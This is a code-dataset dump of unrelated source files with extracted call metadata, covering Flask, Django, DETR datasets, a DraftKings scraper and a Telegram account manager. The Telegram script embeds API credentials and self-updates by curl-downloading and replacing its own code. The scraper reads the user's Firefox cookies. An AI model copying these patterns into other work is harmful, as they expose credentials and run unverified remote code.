'gridlines': {'color': '#e7e9dc'},
'minValue': 0},
'legend': {'position': 'none'},
'height': 350,
'tooltip': {'isHtml': 1}}
def populate(self, pages):
self.data = [[
'Title',
'Rating',
{'role': 'tooltip', 'p': {'html': 'true'}},
{'role': 'style'}]]
for p in pages:
if 'scp' in p.tags:
color = 'color: #db4437'
elif 'tale' in p.tags:
color = 'color: #4285f4'
else:
color = 'color: #f4b400'
date = p.metadata[self.user].date[:10] or '-'
tooltip = dt.table(
dt.tr(dt.td(p.title, colspan=2)),
dt.tr(dt.td('Rating:'), dt.td(p.rating)),
dt.tr(dt.td('Created:'), dt.td(date)),
cls='articles_chart_tooltip')
self.data.append([
p.title,
p.rating,
tooltip.render(pretty=False),
color])
class ArticlesTable(Chart):
def __init__(self, pages, user):
self.name = 'articles_table'
self.class_name = 'Table'
self.populate(pages, user)
self.options = {
'showRowNumber': 1,
'allowHtml': 1,
'sortColumn': 1,
'sortAscending': 0,
'width': '100%'}
def populate(self, pages, user):
self.data = ['Title Rating Tags Link Created Role'.split()]
for p in pages:
tags = [html('b', t) if t in 'scp tale hub admin author' else t
for t in p.tags]
tags = ', '.join(sorted(tags))
link = html('a', p.url.split('/')[-1], href=p.url)
role = p.metadata[user].role
role = html('span', role, cls='rel-' + role)
date = p.metadata[user].date[:10]
self.data.append([p.title, p.rating, tags, link, date, role])
###############################################################################
def update_user(name):
wiki = pyscp.wikidot.Wiki('scp-stats')
wiki.auth(core.config.wiki.name, core.config.wiki.password)
p = wiki('user:' + name.lower())
pages = sorted(
core.pages.related(name),
key=lambda x: (x.metadata[name].date, x.created))
pages = ext.PageView(pages)
if not pages.articles:
return lex.not_found.author
data = USER.format(
summary_table=SummaryTable(pages.primary(name), name).render(),
articles_chart=ArticlesChart(pages.articles, name).render(),
articles_table=ArticlesTable(
[p for p in pages if p.tags], name).render())
p.create(data, title=name, comment='automated update')
return p.url
| [((5816, 5847), 'pyscp.wikidot.Wiki', 'pyscp.wikidot.Wiki', (['"""scp-stats"""'], {}), "('scp-stats')\n", (5834, 5847), False, 'import pyscp\n'), ((2134, 2162), 'textwrap.indent', 'textwrap.indent', (['row', '""" """'], {}), "(row, ' ')\n", (2149, 2162), False, 'import textwrap\n'), ((2215, 2249), 'textwrap.indent', 'textwrap.indent', (['row', "(' ' * indent)"], {}), "(row, ' ' * indent)\n", (2230, 2249), False, 'import textwrap\n'), ((4435, 4460), 'dominate.tags.td', 'dt.td', (['p.title'], {'colspan': '(2)'}), '(p.title, colspan=2)\n', (4440, 4460), True, 'from dominate import tags as dt\n'), ((4485, 4501), 'dominate.tags.td', 'dt.td', (['"""Rating:"""'], {}), "('Rating:')\n", (4490, 4501), True, 'from dominate import tags as dt\n'), ((4503, 4518), 'dominate.tags.td', 'dt.td', (['p.rating'], {}), '(p.rating)\n', (4508, 4518), True, 'from dominate import tags as dt\n'), ((4543, 4560), 'dominate.tags.td', 'dt.td', (['"""Created:"""'], {}), "('Created:')\n", (4548, 4560), True, 'from dominate import tags as dt\n'), ((4562, 4573), 'dominate.tags.td', 'dt.td', (['date'], {}), '(date)\n', (4567, 4573), True, 'from dominate import tags as dt\n')] |
Allenyou1126/allenyou-acme.sh | entry.py | 2f5fa606cb0a66ded49d75a98d0dc47adc68c87c | #!/usr/bin/env python3
import json
from allenyoucert import Cert
def main():
certList = list()
a = json()
main()
| [((109, 115), 'json', 'json', ([], {}), '()\n', (113, 115), False, 'import json\n')] |
quantmind/dynts | dynts/lib/fallback/simplefunc.py | 21ac57c648bfec402fa6b1fe569496cf098fb5e8 |
from .common import *
def tsminmax(v):
mv = NaN
xv = NaN
    for x in v:
if x == x:
if mv == mv:
mv = min(mv,x)
else:
mv = x
if xv == xv:
xv = max(xv,x)
else:
xv = x
return (mv,xv) | [] |
lcsm29/edx-harvard-cs50 | week9/finance/application.py | 283f49bd6a9e4b8497e2b397d766b64527b4786b | import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
return apology("TODO")
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
return apology("TODO")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
return apology("TODO")
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
return apology("TODO")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
return apology("TODO")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
return apology("TODO")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
| [((421, 436), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (426, 436), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((932, 941), 'tempfile.mkdtemp', 'mkdtemp', ([], {}), '()\n', (939, 941), False, 'from tempfile import mkdtemp\n'), ((1024, 1036), 'flask_session.Session', 'Session', (['app'], {}), '(app)\n', (1031, 1036), False, 'from flask_session import Session\n'), ((1091, 1118), 'cs50.SQL', 'SQL', (['"""sqlite:///finance.db"""'], {}), "('sqlite:///finance.db')\n", (1094, 1118), False, 'from cs50 import SQL\n'), ((1154, 1179), 'os.environ.get', 'os.environ.get', (['"""API_KEY"""'], {}), "('API_KEY')\n", (1168, 1179), False, 'import os\n'), ((1316, 1331), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1323, 1331), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1446, 1461), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1453, 1461), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1568, 1583), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (1575, 1583), False, 'from helpers import apology, login_required, lookup, usd\n'), ((1697, 1712), 'flask.session.clear', 'session.clear', ([], {}), '()\n', (1710, 1712), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2843, 2858), 'flask.session.clear', 'session.clear', ([], {}), '()\n', (2856, 2858), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2905, 2918), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2913, 2918), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((3034, 3049), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3041, 3049), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3152, 3167), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3159, 3167), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3285, 3300), 'helpers.apology', 'apology', (['"""TODO"""'], {}), "('TODO')\n", (3292, 3300), False, 'from helpers import apology, login_required, lookup, usd\n'), ((3433, 3456), 'helpers.apology', 'apology', (['e.name', 'e.code'], {}), '(e.name, e.code)\n', (3440, 3456), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2609, 2622), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2617, 2622), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2722, 2751), 'flask.render_template', 'render_template', (['"""login.html"""'], {}), "('login.html')\n", (2737, 2751), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((3400, 3421), 'werkzeug.exceptions.InternalServerError', 'InternalServerError', ([], {}), '()\n', (3419, 3421), False, 'from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\n'), ((1872, 1900), 'flask.request.form.get', 'request.form.get', (['"""username"""'], {}), "('username')\n", (1888, 1900), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((1921, 1958), 'helpers.apology', 'apology', (['"""must provide username"""', '(403)'], {}), "('must provide username', 403)\n", (1928, 1958), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2211, 2239), 'flask.request.form.get', 'request.form.get', (['"""username"""'], {}), "('username')\n", (2227, 2239), 
False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2419, 2467), 'helpers.apology', 'apology', (['"""invalid username and/or password"""', '(403)'], {}), "('invalid username and/or password', 403)\n", (2426, 2467), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2017, 2045), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (2033, 2045), False, 'from flask import Flask, flash, redirect, render_template, request, session\n'), ((2066, 2103), 'helpers.apology', 'apology', (['"""must provide password"""', '(403)'], {}), "('must provide password', 403)\n", (2073, 2103), False, 'from helpers import apology, login_required, lookup, usd\n'), ((2369, 2397), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (2385, 2397), False, 'from flask import Flask, flash, redirect, render_template, request, session\n')] |
iurykrieger96/alura-django | users/forms.py | d8ed9998ccbc629127b2c6ca3ed3798da9a578f3 | from django import forms
from django.contrib.auth.models import User
from django.forms.utils import ErrorList
class UserForm(forms.Form):
name = forms.CharField(required=True)
email = forms.EmailField(required=True)
password = forms.CharField(required=True)
phone = forms.CharField(required=True)
name_company = forms.CharField(required=True)
def is_valid(self):
valid = True
if not super(UserForm, self).is_valid():
            self.add_erro('Please check the information provided')
valid = False
user_exists = User.objects.filter(username=self.data['name']).exists()
if user_exists:
            self.add_erro('User already exists')
valid = False
return valid
def add_erro(self, message):
self._errors.setdefault(forms.forms.NON_FIELD_ERRORS, ErrorList()).append(message)
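# Illustrative behaviour, a sketch rather than part of the original code; the
# field values below are placeholders:
#   form = UserForm(data={'name': 'existing_user', 'email': '[email protected]',
#                         'password': 'x', 'phone': 'x', 'name_company': 'x'})
#   form.is_valid()            # False when 'existing_user' is already taken
#   form.non_field_errors()    # includes the duplicate-user message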
| [((151, 181), 'django.forms.CharField', 'forms.CharField', ([], {'required': '(True)'}), '(required=True)\n', (166, 181), False, 'from django import forms\n'), ((194, 225), 'django.forms.EmailField', 'forms.EmailField', ([], {'required': '(True)'}), '(required=True)\n', (210, 225), False, 'from django import forms\n'), ((241, 271), 'django.forms.CharField', 'forms.CharField', ([], {'required': '(True)'}), '(required=True)\n', (256, 271), False, 'from django import forms\n'), ((284, 314), 'django.forms.CharField', 'forms.CharField', ([], {'required': '(True)'}), '(required=True)\n', (299, 314), False, 'from django import forms\n'), ((334, 364), 'django.forms.CharField', 'forms.CharField', ([], {'required': '(True)'}), '(required=True)\n', (349, 364), False, 'from django import forms\n'), ((578, 625), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username': "self.data['name']"}), "(username=self.data['name'])\n", (597, 625), False, 'from django.contrib.auth.models import User\n'), ((853, 864), 'django.forms.utils.ErrorList', 'ErrorList', ([], {}), '()\n', (862, 864), False, 'from django.forms.utils import ErrorList\n')] |
Kiku-Reise/vsmart | python/manager.py | dd8cf84816da8734e72dbb46c07694f561597648 | from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| [((179, 185), 'colorama.init', 'init', ([], {}), '()\n', (183, 185), False, 'from colorama import init, Fore\n'), ((421, 454), 'os.system', 'os.system', (['"""pip install requests"""'], {}), "('pip install requests')\n", (430, 454), False, 'import pickle, os\n'), ((1014, 1030), 'os.system', 'os.system', (['"""cls"""'], {}), "('cls')\n", (1023, 1030), False, 'import pickle, os\n'), ((1049, 1067), 'os.system', 'os.system', (['"""clear"""'], {}), "('clear')\n", (1058, 1067), False, 'import pickle, os\n'), ((1722, 1753), 'pickle.dump', 'pickle.dump', (['[parsed_number]', 'g'], {}), '([parsed_number], g)\n', (1733, 1753), False, 'import pickle, os\n'), ((2003, 2088), 'telethon.sync.TelegramClient', 'TelegramClient', (['f"""sessions/{number}"""', '(3910389)', '"""86f861352f0ab76a251866059a6adbd6"""'], {}), "(f'sessions/{number}', 3910389,\n '86f861352f0ab76a251866059a6adbd6')\n", (2017, 2088), False, 'from telethon.sync import TelegramClient\n'), ((2649, 2657), 'time.sleep', 'sleep', (['(3)'], {}), '(3)\n', (2654, 2657), False, 'from time import sleep\n'), ((824, 845), 'random.choice', 'random.choice', (['colors'], {}), '(colors)\n', (837, 845), False, 'import random\n'), ((2774, 2859), 'telethon.sync.TelegramClient', 'TelegramClient', (['f"""sessions/{phone}"""', '(3910389)', '"""86f861352f0ab76a251866059a6adbd6"""'], {}), "(f'sessions/{phone}', 3910389, '86f861352f0ab76a251866059a6adbd6'\n )\n", (2788, 2859), False, 'from telethon.sync import TelegramClient\n'), ((4462, 4504), 'os.system', 'os.system', (['f"""del sessions\\\\{session_file}"""'], {}), "(f'del sessions\\\\{session_file}')\n", (4471, 4504), False, 'import pickle, os\n'), ((4531, 4571), 'os.system', 'os.system', (['f"""rm sessions/{session_file}"""'], {}), "(f'rm sessions/{session_file}')\n", (4540, 4571), False, 'import pickle, os\n'), ((4672, 4695), 'pickle.dump', 'pickle.dump', (['account', 'f'], {}), '(account, f)\n', (4683, 4695), False, 'import pickle, os\n'), ((2445, 2459), 'pickle.load', 'pickle.load', (['h'], {}), '(h)\n', (2456, 2459), False, 'import pickle, os\n'), ((5066, 5157), 'requests.get', 'requests.get', (['"""https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt"""'], {}), "(\n 'https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')\n", (5078, 5157), False, 'import requests\n'), ((3732, 3755), 'pickle.dump', 'pickle.dump', (['[Phone]', 'k'], {}), '([Phone], k)\n', (3743, 3755), False, 'import pickle, os\n'), ((4040, 4054), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (4051, 4054), False, 'import pickle, os\n'), ((5887, 5986), 'os.system', 'os.system', (['"""curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py"""'], {}), "(\n 'curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py'\n )\n", (5896, 5986), False, 'import pickle, os\n'), ((5993, 6096), 'os.system', 'os.system', (['"""curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py"""'], {}), "(\n 'curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py'\n )\n", (6002, 6096), False, 'import pickle, os\n'), ((5642, 5665), 'os.system', 'os.system', (['"""del add.py"""'], {}), "('del add.py')\n", (5651, 5665), False, 'import pickle, os\n'), ((5686, 5713), 'os.system', 'os.system', (['"""del manager.py"""'], {}), "('del manager.py')\n", (5695, 5713), False, 'import pickle, os\n'), ((5756, 5778), 'os.system', 'os.system', (['"""rm add.py"""'], {}), "('rm add.py')\n", (5765, 5778), False, 'import pickle, os\n'), ((5799, 5825), 
'os.system', 'os.system', (['"""rm manager.py"""'], {}), "('rm manager.py')\n", (5808, 5825), False, 'import pickle, os\n')] |
rus-kh/m2ee-tools | src/m2ee/client_errno.py | 70000796a53131bb1cd8d199f48cd5e7aab2c505 | #
# Copyright (C) 2009 Mendix. All rights reserved.
#
SUCCESS = 0
# Starting the Mendix Runtime can fail in either a temporary or a permanent way.
# Some of the errors can be fixed with some help from the user.
#
# The default m2ee cli program will only handle a few of these cases, by
# providing additional hints or interactive choices to fix the situation and
# will default to echoing back the error message received from the runtime.
# Database to be used does not exist
start_NO_EXISTING_DB = 2
# Database structure is out of sync with the application domain model, DDL
# commands need to be run to synchronize the database.
start_INVALID_DB_STRUCTURE = 3
# Constant definitions used in the application model are missing from the
# configuration.
start_MISSING_MF_CONSTANT = 4
# In the application database, a user account was detected which has the
# administrative role (as specified in the modeler) and has password '1'.
start_ADMIN_1 = 5
# ...
start_INVALID_STATE = 6
start_MISSING_DTAP = 7
start_MISSING_BASEPATH = 8
start_MISSING_RUNTIMEPATH = 9
start_INVALID_LICENSE = 10
start_SECURITY_DISABLED = 11
start_STARTUP_ACTION_FAILED = 12
start_NO_MOBILE_IN_LICENSE = 13
check_health_INVALID_STATE = 2
| [] |
andrewliao11/detr | datasets/__init__.py | 944bb60e090e6b72aede9574cd2b7f75202cfe05 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch.utils.data
import torchvision
def get_coco_api_from_dataset(dataset_val):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset_val, torch.utils.data.Subset):
dataset_val = dataset_val.dataset
if isinstance(dataset_val, torchvision.datasets.CocoDetection):
return dataset_val.coco
def get_class_mapping(dataset):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return {d["id"]: d["name"].lower() for d in dataset.coco.dataset["categories"]}
def build_dataset(image_set, dataset_args, given_class_mapping=None):
if dataset_args.name in ['mscoco14', 'mscoco17']:
from .coco import build as build_coco
return build_coco(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'virtual_kitti':
from .virtual_kitti import build as build_vkitti
return build_vkitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
#elif dataset_args.name == 'viper':
# from .viper import build as build_viper
# return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'kitti':
from .kitti import build as build_kitti
return build_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'mixed_kitti_virtual_kitti':
from .mixed_kitti_virtual_kitti import build as build_mixed_kitti_virtual_kitti
return build_mixed_kitti_virtual_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'synscapes':
from .synscapes import build as build_synscapes
return build_synscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'cityscapes':
from .cityscapes import build as build_cityscapes
return build_cityscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
else:
raise ValueError(f'dataset {dataset_args.name} not supported')
| [] |
sansbacon/dkhomeleague | dkhomeleague/dkhomeleague.py | 17ab695df9ceccf5b7f135181b19ade8d47add5f | # dkhomeleague.py
import json
import logging
import os
from pathlib import Path
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
            return r.content
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
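# A minimal usage sketch of Scraper (illustrative only; it assumes DK_LEAGUE_KEY and
# DK_USERNAME are set in the environment, or that they are passed explicitly):
#
#   scraper = Scraper()
#   meta = scraper.league_metadata()
#   past = scraper.historical_contests(limit=10)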
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
